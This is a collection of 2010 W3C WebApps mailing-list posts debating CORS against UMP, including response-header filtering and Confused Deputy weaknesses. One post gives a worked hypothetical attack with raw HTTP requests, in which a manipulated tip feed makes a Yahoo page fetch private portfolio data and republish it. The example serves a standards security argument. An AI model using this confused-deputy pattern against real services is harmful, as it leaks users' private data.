Re: CORS ISSUE-108

2010-11-23 Thread Tyler Close
My recollection of the status of ISSUE-108 is that CORS was going to
provide functionality equivalent to that of UMP when the CORS
credentials flag is false. CORS was also also going to expand its
Security Considerations section to explain the Confused Deputy issues,
possibly by borrowing text from UMP. Are you saying that work has been
completed or it will not be undertaken? The current editor's draft of
CORS does mention a credentials flag, but I haven't found much detail
on it. For example, what effect does it have on use of the browser's
request cache?

--Tyler

On Wed, Nov 17, 2010 at 6:40 AM, Anne van Kesteren ann...@opera.com wrote:
 http://www.w3.org/2008/webapps/track/issues/108 has been open for a year and
 we have made little concrete progress on it unfortunately. Meanwhile, CORS
 is shipping, deployed and nobody is planning to take it out or down as far
 as I know. I think it is time to move on and go to Last Call.

 I am open to spending a few more days on finding a solution to this problem
 we can all agree with, but if we have nothing by December 1 and at that
 point it does not seem likely it will get anywhere we should go for a Last
 Call CfC (or maybe straight to a formal vote) and call it a day.


 --
 Anne van Kesteren
 http://annevankesteren.nl/





Re: Seeking agenda items for WebApps' Nov 1-2 f2f meeting

2010-09-13 Thread Tyler Close
On Sat, Sep 11, 2010 at 7:00 AM, Mark S. Miller erig...@google.com wrote:
 On Sat, Sep 11, 2010 at 5:43 AM, Arthur Barstow art.bars...@nokia.com
 wrote:

 * CORS, UMP - Anne will attend but what about MarkM and Tyler? Jeff,
 Thomas - are you planning some type of Web Application Security meeting/BoF?

 I will not be attending due to a schedule conflict.

I have the same schedule conflict.

--Tyler



Re: [cors] Unrestricted access

2010-07-14 Thread Tyler Close
On Tue, Jul 13, 2010 at 8:12 AM, Jonas Sicking jo...@sicking.cc wrote:
 On Tue, Jul 13, 2010 at 3:47 AM, Anne van Kesteren ann...@opera.com wrote:
 On Tue, 13 Jul 2010 12:35:02 +0200, Jaka Jančar j...@kubje.org wrote:

 What I'd like is a global (per-host) way to disable these limitations all
 at once, giving XHR unrestricted access to the host, just like native apps
 have it.

 It used to be a mostly global per-resource switch, but the security folks
 at Mozilla thought that was too dangerous and we decided to go with the
 granular approach they proposed. This happened during a meeting in the
 summer of 2008 at Microsoft. I do not believe anything has changed meanwhile
 so this will probably not happen.

 This does not match my recollection of our requirements. The most
 important requirements that we had was that it was possible to opt in
 on a very granular basis, and that it was possible to opt in without
 getting cookies. Also note that the latter wasn't possible before we
 requested it and so this users requirements would not have been
 fulfilled if it wasn't for the changes we requested.

 Anyhow if we want to reopen discussions about syntax for the various
 headers that cors uses, for example to allow '*' as value, then I'm ok
 with that. Though personally I'd prefer to just ship this thing as
 it's a long time coming.

Unless IE is soon to indicate support for all of the extra CORS
headers, pre-flight requests and configuration caching, the decision
should be to drop these unsupported features from the specification
and come up with a solution that can achieve consensus among widely
deployed browsers. I thought that was the declared policy for HTML5.
As you know, I also think that is the right decision for many
technical and security reasons.

Jaka's request is reasonable and what the WG is offering in response
is unreasonable. I expect many other web application developers will
have needs similar to Jaka's. Meeting those needs with a simple
solution is technically feasible. The politics seem to be much more
difficult.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] Unrestricted access

2010-07-14 Thread Tyler Close
On Wed, Jul 14, 2010 at 12:02 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, Jul 14, 2010 at 10:39 AM, Tyler Close tyler.cl...@gmail.com wrote:
 On Tue, Jul 13, 2010 at 8:12 AM, Jonas Sicking jo...@sicking.cc wrote:
 On Tue, Jul 13, 2010 at 3:47 AM, Anne van Kesteren ann...@opera.com wrote:
 On Tue, 13 Jul 2010 12:35:02 +0200, Jaka Jančar j...@kubje.org wrote:

 What I'd like is a global (per-host) way to disable these limitations all
 at once, giving XHR unrestricted access to the host, just like native apps
 have it.

 It used to be a mostly global per-resource switch, but the security folks
 at Mozilla thought that was too dangerous and we decided to go with the
 granular approach they proposed. This happened during a meeting in the
 summer of 2008 at Microsoft. I do not believe anything has changed 
 meanwhile
 so this will probably not happen.

 This does not match my recollection of our requirements. The most
 important requirements that we had was that it was possible to opt in
 on a very granular basis, and that it was possible to opt in without
 getting cookies. Also note that the latter wasn't possible before we
 requested it and so this users requirements would not have been
 fulfilled if it wasn't for the changes we requested.

 Anyhow if we want to reopen discussions about syntax for the various
 headers that cors uses, for example to allow '*' as value, then I'm ok
 with that. Though personally I'd prefer to just ship this thing as
 it's a long time coming.

 Unless IE is soon to indicate support for all of the extra CORS
 headers, pre-flight requests and configuration caching, the decision
 should be to drop these unsupported features from the specification
 and come up with a solution that can achieve consensus among widely
 deployed browsers. I thought that was the declared policy for HTML5.
 As you know, I also think that is the right decision for many
 technical and security reasons.

 Jaka's request is reasonable and what the WG is offering in response
 is unreasonable. I expect many other web application developers will
 have needs similar to Jaka's. Meeting those needs with a simple
 solution is technically feasible. The politics seem to be much more
 difficult.

 As far as I understand, UMP requires the exact same sever script, no?

UMP Level One doesn't use pre-flight requests so doesn't have this
complexity, but also doesn't enable arbitrary HTTP methods and
headers. Instead, the plan was to have UMP Level Two introduce a
well-known URL per host that could be consulted to turn on this
functionality for all resources. Level One and Level Two are split
since Level One is meant to cover only things that are currently
deployed.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] Simplify CORS Headers (ISSUE-89)

2010-05-26 Thread Tyler Close
On Mon, May 24, 2010 at 8:23 AM, Adrian Bateman adria...@microsoft.com wrote:
 In IE, we only support Access-Control-Allow-Origin and combining with other 
 values (albeit optional ones) that we don't support might be misleading. It 
 also introduces some additional parsing that changes the behaviour from a 
 simple comparison to a more complex parse and then compare.

The above statement seems to imply that there are no plans for IE to
support the optional features of CORS such as pre-flight and user
credentials. Am I reading the statement correctly?

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: widget example of CORS and UMP

2010-05-14 Thread Tyler Close
On Fri, May 14, 2010 at 1:15 AM, Maciej Stachowiak m...@apple.com wrote:
 OK, so there's two vulnerability scenarios:

Actually, there is at least one other kind of vulnerability in the
CORS design that has not been mentioned by anyone yet and that does
not require XSS or untrusted code.

Before I describe the attack, I want to remind everyone that the
purpose of this particular scenario was to study the usability of CORS
and UMP in a benign situation. This example only has a page from Yahoo
talking to servers also operated by Yahoo. There are also no
side-effects in this example; it's purely a data presentation example.
Given that CORS and UMP are new protocols and that this is the most
benign scenario we can conjure, I think it's fair to expect a solution
with strong security properties. It should be damning if the solution
to this very simple scenario introduces complex security problems.

First I'll explain a concrete attack against the concrete example, and
then I'll generalize it to explain why we should expect this problem
to be recurring.

The CORS solution to the scenario creates a widely known URL,
http://finance.yahoo.com/api/v1/my_portfolio;, that is treated
specially when the request happens to come from the my.yahoo.com
origin. If you have tunnel vision on only the portfolio widget, then
you might see no problem, but there are also other pages with other
content on the my.yahoo.com domain. What happens if they make a
request to this same URL, could something unexpected and wrong happen?

Let's say myYahoo also has a page that fetches the HotTrade of the
Day and posts its current price to my public activity
stream, letting my friends know what investment I'm researching at the
moment. The code for this content is audited by Yahoo and is not
malicious. The HotTrade of the day can be on any market in the world
and for anything. It might be hog futures in China or rice in Chicago.
The page is used by momentum traders who just want to invest in
anything
that's moving quickly. Since no site lists the price of everything
that can be traded, HotStocks returns the URL to GET the current
price. The page content was created by a trading firm that wants to
boost trades and attract new customers interested in trading on all of
the world's markets.

The page content makes the following requests:

GET http://hottrades.foo/hotnow HTTP/1.0
Origin: my.yahoo.com

HTTP/1.0 200 OK
Content-Type: text/plain

http://finance.yahoo.com/stock/goog/instaprice

and then:

GET http://finance.yahoo.com/stock/goog/instaprice HTTP/1.0
Origin: my.yahoo.com

HTTP/1.0 200 OK
Content-Type: text/plain

510.88

and then:

POST http://my.yahoo.com/stream/append HTTP/1.0
Origin: my.yahoo.com
Content-Type: text/plain

I got my tip at 510.88. Find your price at:
http://finance.yahoo.com/stock/goog/instaprice

HTTP/1.0 204 OK

Later, an attacker causes an unexpected URL to get into the HotTrades
tip stream, resulting in the my.yahoo.com page doing the following:

GET http://hottrades.foo/hotnow HTTP/1.0
Origin: my.yahoo.com

HTTP/1.0 200 OK
Content-Type: text/plain

http://finance.yahoo.com/api/v1/portfolio/mine

and then:

GET http://finance.yahoo.com/api/v1/portfolio/mine HTTP/1.0
Origin: my.yahoo.com

HTTP/1.0 200 OK
Content-Type: application/json

{ /* all my portfolio data */ }

and then:

POST http://my.yahoo.com/stream/append HTTP/1.0
Origin: my.yahoo.com
Content-Type: text/plain

I got my tip at { /* all my portfolio data */ }. Find your price at:
http://finance.yahoo.com/api/v1/portfolio/mine

HTTP/1.0 204 OK

If the Yahoo Finance portfolio was designed to use UMP instead of
CORS, this hack would not compromise any private
portfolio data since the attacker doesn't know the unguessable secret
for anyone's private portfolio.

The fundamental problem with the CORS design is that it attaches
ambient permission to a well-known URL, the portfolio URL, so code
that thinks it is just fetching public data might inadvertently fetch
private data and reveal it. What URLs refer to private data versus
public data is unknowable by the web content. Any content that fetches
public data and then publishes a report on it could fall victim to
this kind of attack in a CORS world. For example, earlier Nathan was
interested in building a client-side web app that fetched Semantic Web
data from a variety of sources, computed on it and produced a result.
This app could very easily fall victim to this kind of Confused Deputy
attack in a CORS world. How is the app to know which URLs it accesses
have ambient permission attached to them that results in private data
being returned? In an UMP world, the app can fetch data without
attaching any credentials, so knows that anything that comes back must
not be user private data.

Considered only in isolation, the CORS solution might seem simple and
secure[1]. When you consider the effect this code has on the rest of
the origin and all the other code running on that origin, it clearly
not secure. How is every 

Re: widget example of CORS and UMP

2010-05-14 Thread Tyler Close
On Fri, May 14, 2010 at 11:00 AM, Dirk Pranke dpra...@chromium.org wrote:
 On Fri, May 14, 2010 at 1:15 AM, Maciej Stachowiak m...@apple.com wrote:
 There are also more subtle risks to shared secrets. If you are creating your
 secrets with a bad random number generator, then they will not in fact be
 unguessable and you have a huge vulnerability. Even security experts can
 make this mistake, here is an example that impacted a huge number of people:
 http://www.debian.org/security/2008/dsa-1571.


 Sure.

Is someone claiming that the CORS cookie solution does not require use
of a random number generator? What's in the cookie and where did it
come from?

Access to a good random number generator is a requirement for either
solution and so is not relevant to this discussion.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: widget example of CORS and UMP

2010-05-14 Thread Tyler Close
On Fri, May 14, 2010 at 12:27 PM, Dirk Pranke dpra...@chromium.org wrote:
 On Fri, May 14, 2010 at 12:00 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Fri, May 14, 2010 at 11:27 AM, Dirk Pranke dpra...@chromium.org wrote:
 On Fri, May 14, 2010 at 10:18 AM, Tyler Close tyler.cl...@gmail.com wrote:
 On Fri, May 14, 2010 at 1:15 AM, Maciej Stachowiak m...@apple.com wrote:
 OK, so there's two vulnerability scenarios:

 Actually, there is at least one other kind of vulnerability in the
 CORS design that has not been mentioned by anyone yet and that does
 not require XSS or untrusted code.

 Before I describe the attack, I want to remind everyone that the
 purpose of this particular scenario was to study the usability of CORS
 and UMP in a benign situation. This example only has a page from Yahoo
 talking to servers also operated by Yahoo. There are also no
 side-effects in this example; it's purely a data presentation example.
 Given that CORS and UMP are new protocols and that this is the most
 benign scenario we can conjure, I think it's fair to expect a solution
 with strong security properties. It should be damning if the solution
 to this very simple scenario introduces complex security problems.


 We are talking about enabling a class of functionality (cross-origin
 messaging) that isn't currently possible on the web. Obviously if it is
 possible to do so securely and easily, that's a good thing. If that is not
 possible, and the options are to enable things that have relative degrees
 of security or ease of use, then it becomes much more debatable.
 Damning is a strong word to use in this situation,

 If the introduced security problems are complex and therefore hard or
 infeasible to solve, then damning is the right word. If the simple,
 benign scenario is made infeasible, that's damning.

  especially since I
 think most people would see the interchange between Maciej and I that
 neither solution (CORS or UMP) makes things trivially securable. Another
 conclusion could be that doing this stuff is just hard.

 There's a big difference between trivially and infeasible. What are
 the issues with UMP where we cannot provide concrete guidance to
 developers? As I've shown, there are hard unknowns in the CORS
 solution.

 You've shown that there are cases where CORS is not secure. I don't know that
 I would agree with your assessment that you've shown that there are
 hard unknowns.

Further down in this email, you punt on my example, saying that it
can't be deployed. If there are classes of applications that CORS
cannot address, and these classes are important, then there are hard
unknowns in CORS. For example, will the Security Considerations
section of CORS have to say:

It is not safe in CORS to make a GET request for public data using a
URL obtained from a possibly malicious party. Validating the URL
requires global knowledge of all origins that might grant special
access to the requestor's origin, and so return private user data.

 As Maciej has shown, simply saying make sure the URL can't be easily
 obtained is not
 that easy.

I saw him assert that. I didn't see him show that. What are the
pitfalls that have not been addressed in the UMP spec?

 If the Yahoo Finance portfolio was designed to use UMP instead of
 CORS, this hack would not compromise any private
 portfolio data since the attacker doesn't know the unguessable secret
 for anyone's private portfolio.


 If the code had been audited, then it is reasonable to assume that someone
 would have caught that allowing the HotTrades service to tell the user to
 fetch *any url at all* was a bad idea, and the API should have been
 restricted to GET http://finance.yahoo.com/stock/%s/instaprice; instead
 of GET %s.

 You've changed the scenario so that now HotTrades can only happen on
 Yahoo listed securities, instead of those listed on any exchange in
 the world. You have to allow fetching of any URL to make the
 application work.

 If that is true, then a reasonable audit would not allow that app to run on
 my.yahoo.com, because of the dangers involved.

Or, a reasonable audit could say: that's a fine app, so long as
you're using UMP. If CORS requires the app to be rejected, that's a
failure for CORS and this WG.

I see the WG's role here as defining a protocol that enables
applications. Saying don't do that, as has become popular of late on
this list, is failure.

 A possible CORS solution is to check that the URL
 does not refer back to a user private resource on my.yahoo.com and so
 do a check on the domain in the URL from HotTrades. However, now you
 have to wonder about other domains that accept cross-domain requests
 from my.yahoo.com, such as finance.yahoo.com. How do you list all
 other domains that might be giving special cross-domain access to
 my.yahoo.com? You can't; it's an unbounded list that is not even under
 the control of my.yahoo.com.

 This is also what Maciej said in his Don't Be a Deputy
 Slides - Guarantee that requests

Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Tue, May 11, 2010 at 5:15 PM, Ian Hickson i...@hixie.ch wrote:
 On Tue, 11 May 2010, Tyler Close wrote:

 CORS introduces subtle but severe Confused Deputy vulnerabilities

 I don't think everyone is convinced that this is the case.

AFAICT, there is consensus that CORS has Confused Deputy
vulnerabilities. I can pull up email quotes from almost everyone
involved in the conversation.

It is also not a question of opinion, but fact. CORS uses ambient
authority for access control in 3 party scenarios. CORS is therefore
vulnerable to Confused Deputy.

 It is certainly
 possible to mis-use CORS in insecure ways, but then it's also possible to
 mis-use UMP in insecure ways. As far as I can tell, confused deputy
 vulnerabilities only occur with CORS if you use it in inappropriate ways,
 such as sharing identifiers amongst different origins without properly
 validating that they aren't spoofing each other.

In the general case, including many common cases, doing this
validation is not feasible. The CORS specification should not be
allowed to proceed through standardization without providing
developers a robust solution to this problem.

CORS is a new protocol and the WG has been made aware of the security
issue before applications have become widely dependent upon it. The WG
cannot responsibly proceed with CORS as is.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 11:21 AM, Ojan Vafai o...@chromium.org wrote:
 On Wed, May 12, 2010 at 9:01 AM, Tyler Close tyler.cl...@gmail.com wrote:

 In the general case, including many common cases, doing this
 validation is not feasible. The CORS specification should not be
 allowed to proceed through standardization without providing
 developers a robust solution to this problem.

 CORS is a new protocol and the WG has been made aware of the security
 issue before applications have become widely dependent upon it. The WG
 cannot responsibly proceed with CORS as is.

 Clearly there is a fundamental philosophical difference here. The end result
 is pretty clear:
 1. Every implementor except Caja is implementing CORS and prefers a unified
 CORS/UMP spec.

IE does not currently implement the disputed sections of CORS. I don't
know what their plans are. Without IE support, the disputed sections
of CORS are not a viable option for developers.

Caja and similar technologies are unable to implement full CORS. It's
not just that they don't want to.

 2. Some implementors are unwilling to implement a separate UMP spec.

So CORS normatively claims to implement UMP and uses its algorithmic
spec to show how.

 The same arguments have been hashed out multiple times. The above is not
 going to change by talking through them again.
 Blocking the CORS spec on principle is meaningless at this point. Even if
 the spec were not officially standardized. It's shipping in browsers. It's
 not going to be taken back.

Again, the disputed sections of CORS are not yet widely deployed (no
IE) and so are not yet widely adopted by developers.

 Realistically, UMP's only hope of actually getting wide adoption is if it's
 part of the CORS spec. Can you focus on improving CORS so that it addresses
 your concerns as much as realistically possible?

UMP has had that effect on CORS and I'll continue to pursue this. I
also want to see the bad stuff removed.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 11:42 AM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, May 12, 2010 at 11:35 AM, Tyler Close tyler.cl...@gmail.com wrote:
 On Wed, May 12, 2010 at 11:21 AM, Ojan Vafai o...@chromium.org wrote:
 On Wed, May 12, 2010 at 9:01 AM, Tyler Close tyler.cl...@gmail.com wrote:

 In the general case, including many common cases, doing this
 validation is not feasible. The CORS specification should not be
 allowed to proceed through standardization without providing
 developers a robust solution to this problem.

 CORS is a new protocol and the WG has been made aware of the security
 issue before applications have become widely dependent upon it. The WG
 cannot responsibly proceed with CORS as is.

 Clearly there is a fundamental philosophical difference here. The end result
 is pretty clear:
 1. Every implementor except Caja is implementing CORS and prefers a unified
 CORS/UMP spec.

 IE does not currently implement the disputed sections of CORS. I don't
 know what their plans are. Without IE support, the disputed sections
 of CORS are not a viable option for developers.

 Really? As far as I know IE sends the Origin header which as I
 understood it was a major source of the confused deputy problem and a
 big reason for drafting the UMP spec?

Yes, IE does implement one disputed feature. I'm just pointing out
that much of the disputed text is not widely deployed, despite claims
to the contrary.

 Realistically, UMP's only hope of actually getting wide adoption is if it's
 part of the CORS spec. Can you focus on improving CORS so that it addresses
 your concerns as much as realistically possible?

 UMP has had that effect on CORS and I'll continue to pursue this. I
 also want to see the bad stuff removed.

 If so, I'd really like to see the chairs move forward with making the
 WG make some sort of formal decision on weather CORS should be
 published or not. Repeating the same discussion over and over is not
 good use your time or mine.

I certainly agree that this has consumed way more time than I would
like. I remain baffled that it's such a hard point to make. The
purpose of CORS is to enable 3 party scenarios. Use of ambient
authority in 3 party scenarios creates Confused Deputy
vulnerabilities. Even simple scenarios are vulnerable if one of the
parties is an attacker. I've shown how to use UMP instead for every
use case anyone has brought up. At this point, my only guess is that
I'm arguing against sunk cost.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CORS Header Filtering?

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 12:33 PM, Nathan nat...@webr3.org wrote:
 Yes,

 The simplest argument I can give is that we (server admins) are trusted to
 set the CORS headers, but not to remove any headers we don't want an XHR
 request to see - this is frankly ridiculous.

The problem is there might not be a single server admin but many.
Quoting from the UMP spec:


Some HTTP servers construct an HTTP response in multiple stages. In
such a deployment, an earlier stage might produce a uniform response
which is augmented with additional response headers by a later stage
that does not understand a uniform response header. This later stage
might add response headers with the expectation they will be protected
by the Same Origin Policy. The developer of the earlier stage might be
unable to update the program logic of the later stage. To accommodate
this deployment scenario, user-agents can filter out response headers
on behalf of the server before exposing a uniform response to the
requesting content.


http://dev.w3.org/2006/waf/UMP/#response-header-filtering

I believe the design presented in UMP for response header filtering
addresses all use-cases, including your Location header example
below.

--Tyler

 CORS and same origin rules have already closed off the web and made *true*
 client side applications almost impossible, in addition it's planned to
 remove headers which are vital for many applications to work. Including many
 headers that are vital to the way the web works and part of the HTTP spec
 for very good reasons.

 Can't happen, not good, no argument could ever change my opinion on this,
 and it definitely needs changed.

 http://tools.ietf.org/html/rfc5023#section-5.3

 AtomPub 5.3: Creating a Resource
 ..If the Member Resource was created successfully, the server
 responds with a status code of 201 and a *Location* header that
 contains the IRI of the newly created Entry Resource.

 You can't seriously block REST, the design of the web - this is ridiculous.

 Nathan

 Devdatta wrote:

 IIRC HTTP-WG has asked this WG to change this behavior from a
 whitelist to a blacklist. There was a huge discussion about this a
 while back -- maybe this could be an example of why CORS should follow
 the HTTP-WG's recommendations.

 -devdatta

 On 12 May 2010 11:50, Nathan nat...@webr3.org wrote:

 All,

 Serious concern this time, I've just noted that as per 6.1 Cross-Origin
 Request of the CORS spec, User Agents must strip all response headers
 other
 than:

 * Cache-Control
 * Content-Language
 * Content-Type
 * Expires
 * Last-Modified
 * Pragma

 This simply can't be, many other headers are needed

 Link header is going to be heavily used (notably for Web Access Control!)

 Allow is needed when there's a 405 response (use GET instead of POST)

 Content-Location is needed to be able to show the user the real URI and
 provide it for subsequent requests and bookmarks

 Location is needed when a new resource has been created via POST (where a
 redirect wouldn't happen).

 Retry-After  Warning are needed for rather obvious reasons.

 There are non rfc2616 headers on which functionality is often dependent
 (DAV
 headers for instance) - SPARQL Update also exposes via the MS-Author-via
 header.

 In short there are a whole host of reasons why many different headers are
 needed (including many not listed here).

 Nathan










-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CORS Header Filtering?

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 1:05 PM, Nathan nat...@webr3.org wrote:
 Tyler Close wrote:

 On Wed, May 12, 2010 at 12:33 PM, Nathan nat...@webr3.org wrote:

 Yes,

 The simplest argument I can give is that we (server admins) are trusted
 to
 set the CORS headers, but not to remove any headers we don't want an XHR
 request to see - this is frankly ridiculous.

 The problem is there might not be a single server admin but many.
 Quoting from the UMP spec:

 
 Some HTTP servers construct an HTTP response in multiple stages. In
 such a deployment, an earlier stage might produce a uniform response
 which is augmented with additional response headers by a later stage
 that does not understand a uniform response header. This later stage
 might add response headers with the expectation they will be protected
 by the Same Origin Policy. The developer of the earlier stage might be
 unable to update the program logic of the later stage. To accommodate
 this deployment scenario, user-agents can filter out response headers
 on behalf of the server before exposing a uniform response to the
 requesting content.
 

 http://dev.w3.org/2006/waf/UMP/#response-header-filtering

 I believe the design presented in UMP for response header filtering
 addresses all use-cases, including your Location header example
 below.

 Yes that pretty much covers it, can you confirm if Uniform-Headers would
 include the Link header as white-listed? That's the last remaining crucial
 one not covered. (Link header is standards track now).

The response would have to also include the header Uniform-Headers: Link

 BTW: I will point out that I hadn't reviewed the UMP spec yet so thisn't
 isn't any political or preference thing.

 I still stand by my statement though, CORS cannot possible go through to REC
 status without the headers whitelisted in UMP + the Link header.

 Although my preference for both specs would be a Blacklist..

We can't know the names of all the possibly dangerous headers. A
dynamic whitelist defined by the server is the best we can do.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 1:13 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, May 12, 2010 at 12:38 PM, Devdatta dev.akh...@gmail.com wrote:
 While most of the discussion in this thread is just repeats of
 previous discussions, I think Tyler makes a good (and new) point in
 that the current CORS draft still has no mention of the possible
 security problems that Tyler talks about. The current draft's security
 section

 http://dev.w3.org/2006/waf/access-control/#security

 is ridiculous considering the amount of discussion that has taken
 place on this issue on this mailing list.

 Before going to rec, I believe Anne needs to substantially improve
 this section - based on stuff from maybe Maciej's presentation - which
 I found really informative. He could also cite UMP as a possible
 option for those worried about security.

 I agree that the security section in CORS needs to be improved.

 As for the should CORS exist discussion, I'll bow out of those until
 we're starting to move towards officially adopting a WG decision one
 way or another, or genuinely new information is provided which would
 affect such a decision (for the record, I don't think I've seen any
 new information provided since last fall's TPAC).

A smart guy once told me that You can't tell people anything,
meaning they have to experience it for themselves before they really
get it. Has Mozilla tried to build anything non-trivial using CORS
where cookies + Origin are the access control mechanism? If so, I'll
do a security review of it and we'll see what we learn.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 4:45 PM, Adam Barth w...@adambarth.com wrote:
 On Wed, May 12, 2010 at 4:38 PM, Dirk Pranke dpra...@google.com wrote:
 On Wed, May 12, 2010 at 4:06 PM, Adam Barth w...@adambarth.com wrote:
 On Wed, May 12, 2010 at 3:16 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Wed, May 12, 2010 at 1:38 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, May 12, 2010 at 1:31 PM, Tyler Close tyler.cl...@gmail.com 
 wrote:
 On Wed, May 12, 2010 at 1:13 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, May 12, 2010 at 12:38 PM, Devdatta dev.akh...@gmail.com wrote:
 While most of the discussion in this thread is just repeats of
 previous discussions, I think Tyler makes a good (and new) point in
 that the current CORS draft still has no mention of the possible
 security problems that Tyler talks about. The current draft's security
 section

 http://dev.w3.org/2006/waf/access-control/#security

 is ridiculous considering the amount of discussion that has taken
 place on this issue on this mailing list.

 Before going to rec, I believe Anne needs to substantially improve
 this section - based on stuff from maybe Maciej's presentation - which
 I found really informative. He could also cite UMP as a possible
 option for those worried about security.

 I agree that the security section in CORS needs to be improved.

 As for the should CORS exist discussion, I'll bow out of those until
 we're starting to move towards officially adopting a WG decision one
 way or another, or genuinely new information is provided which would
 affect such a decision (for the record, I don't think I've seen any
 new information provided since last fall's TPAC).

 A smart guy once told me that You can't tell people anything,
 meaning they have to experience it for themselves before they really
 get it. Has Mozilla tried to build anything non-trivial using CORS
 where cookies + Origin are the access control mechanism? If so, I'll
 do a security review of it and we'll see what we learn.

 Not to my knowledge, no. I believe we use CORS for tinderboxpushlog
 [1], however since that is only dealing with public data I don't
 believe it uses cookies or Origin headers.

 Does anyone have something?

 At the risk of getting myself involved in this discussion again, you
 might consider doing a security analysis of Facebook Chat.  Although
 Facebook Chat uses postMessage, it uses both cookies and postMessage's
 origin property for authentication, so it might be a system of the
 kind you're interested in analyzing.


 I think (although I'm not certain) that Tyler is asking partially to
 figure out where a non-anonymous CORS request is used in the real
 world. If he isn't, then I am :)

 Given that a major (but not the only) claim of the need to adopt CORS
 with support for cookies and the Origin header is that it is in fact
 already implemented and shipping, it would be good to see how it's
 being used. If we can't find any examples of it being used (in the
 non-anonymous case, at least), then the argument against us having to
 keep it would hold less water. If we can find it being used, then we
 can see both how we would handle the case with UMP, and whether or not
 the CORS usage is in fact secure.

 Oh, I misunderstood.  I thought he wanted to do a security review to
 show that there was a confused deputy causing problems.

Both Adam and Dirk understood correctly. Ideally, I'd like an actual
CORS example to work on, since I'd have to make analogies with
postMessage(), and I've already made a ton of analogies, apparently to
little effect. If people don't fully appreciate the relationship
between form based CSRF and CORS based Confused Deputy, then we need
an actual CORS application.

Out of curiosity, who are the 3 parties involved in the facebook chat
example? The little chat widget in the corner of the facebook page
looks like a same origin application.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 5:07 PM, Adam Barth w...@adambarth.com wrote:
 On Wed, May 12, 2010 at 4:56 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Wed, May 12, 2010 at 4:45 PM, Adam Barth w...@adambarth.com wrote:
 On Wed, May 12, 2010 at 4:38 PM, Dirk Pranke dpra...@google.com wrote:
 On Wed, May 12, 2010 at 4:06 PM, Adam Barth w...@adambarth.com wrote:
 On Wed, May 12, 2010 at 3:16 PM, Tyler Close tyler.cl...@gmail.com 
 wrote:
 On Wed, May 12, 2010 at 1:38 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, May 12, 2010 at 1:31 PM, Tyler Close tyler.cl...@gmail.com 
 wrote:
 On Wed, May 12, 2010 at 1:13 PM, Jonas Sicking jo...@sicking.cc 
 wrote:
 On Wed, May 12, 2010 at 12:38 PM, Devdatta dev.akh...@gmail.com 
 wrote:
 While most of the discussion in this thread is just repeats of
 previous discussions, I think Tyler makes a good (and new) point in
 that the current CORS draft still has no mention of the possible
 security problems that Tyler talks about. The current draft's 
 security
 section

 http://dev.w3.org/2006/waf/access-control/#security

 is ridiculous considering the amount of discussion that has taken
 place on this issue on this mailing list.

 Before going to rec, I believe Anne needs to substantially improve
 this section - based on stuff from maybe Maciej's presentation - 
 which
 I found really informative. He could also cite UMP as a possible
 option for those worried about security.

 I agree that the security section in CORS needs to be improved.

 As for the should CORS exist discussion, I'll bow out of those until
 we're starting to move towards officially adopting a WG decision one
 way or another, or genuinely new information is provided which would
 affect such a decision (for the record, I don't think I've seen any
 new information provided since last fall's TPAC).

 A smart guy once told me that You can't tell people anything,
 meaning they have to experience it for themselves before they really
 get it. Has Mozilla tried to build anything non-trivial using CORS
 where cookies + Origin are the access control mechanism? If so, I'll
 do a security review of it and we'll see what we learn.

 Not to my knowledge, no. I believe we use CORS for tinderboxpushlog
 [1], however since that is only dealing with public data I don't
 believe it uses cookies or Origin headers.

 Does anyone have something?

 At the risk of getting myself involved in this discussion again, you
 might consider doing a security analysis of Facebook Chat.  Although
 Facebook Chat uses postMessage, it uses both cookies and postMessage's
 origin property for authentication, so it might be a system of the
 kind you're interested in analyzing.


 I think (although I'm not certain) that Tyler is asking partially to
 figure out where a non-anonymous CORS request is used in the real
 world. If he isn't, then I am :)

 Given that a major (but not the only) claim of the need to adopt CORS
 with support for cookies and the Origin header is that it is in fact
 already implemented and shipping, it would be good to see how it's
 being used. If we can't find any examples of it being used (in the
 non-anonymous case, at least), then the argument against us having to
 keep it would hold less water. If we can find it being used, then we
 can see both how we would handle the case with UMP, and whether or not
 the CORS usage is in fact secure.

 Oh, I misunderstood.  I thought he wanted to do a security review to
 show that there was a confused deputy causing problems.

 Both Adam and Dirk understood correctly. Ideally, I'd like an actual
 CORS example to work on, since I'd have to make analogies with
 postMessage(), and I've already made a ton of analogies, apparently to
 little effect. If people don't fully appreciate the relationship
 between form based CSRF and CORS based Confused Deputy, then we need
 an actual CORS application.

 Out of curiosity, who are the 3 parties involved in the facebook chat
